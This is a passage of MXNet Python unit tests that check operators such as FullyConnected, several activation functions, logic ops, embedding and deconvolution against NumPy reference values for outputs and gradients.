fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
fc_bias = mx.nd.random.uniform(shape=(10), dtype=np.float32)
fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
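    # Fixed constants from "Self-Normalizing Neural Networks"
    # (Klambauer et al., 2017), chosen so that SELU preserves zero mean and
    # unit variance of activations.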
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
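    # These helpers implement the tanh approximation of GELU:
    # gelu(x) ~= 0.5 * x * (1 + tanh(sqrt(2/pi) * (x + 0.044715 * x^3))),
    # with ROOT_TWO_OVER_PI = sqrt(2/pi).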
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg.asnumpy(), np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg.asnumpy(), np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
        # hard_sigmoid is not differentiable at x = ±2.5, where alpha*x + beta hits the 0/1 clamps
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0].asnumpy()
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0].asnumpy()
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0].asnumpy()
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out.asnumpy(), reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out.asnumpy(), reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0].asnumpy(), np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"].asnumpy(), np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0].asnumpy(), data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
    # the gradient of sign() is zero everywhere
    npout_grad = np.zeros(shape)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1.asnumpy(), npout_grad1)
assert_almost_equal(arr_grad2.asnumpy(), npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1.asnumpy(), npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0].asnumpy(), rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
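    # With stride 1, an output length of in + 2*pad - kernel + 1 reduces to
    # in when kernel = 2*pad + 1, so conv and deconv both preserve shape.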
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy(), deconv_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
